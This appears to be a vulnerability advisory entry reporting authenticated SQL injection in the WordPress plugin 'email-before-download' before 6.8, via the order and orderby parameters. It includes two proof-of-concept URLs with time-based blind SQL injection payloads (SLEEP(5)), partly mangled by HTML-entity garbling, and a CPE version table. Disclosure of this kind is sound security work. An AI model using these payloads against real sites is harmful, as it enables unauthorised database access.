The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues
https://example.com/wp-admin/admin.php?page=email-before-download-linksℴ=desc&orderby;=time_requested+AND+(SELECT+1554+FROM+(SELECT(SLEEP(5)))gPZH) https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby;=time_requestedℴ=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
CPE | Name | Operator | Version |
---|---|---|---|
email-before-download | lt | 6.8 |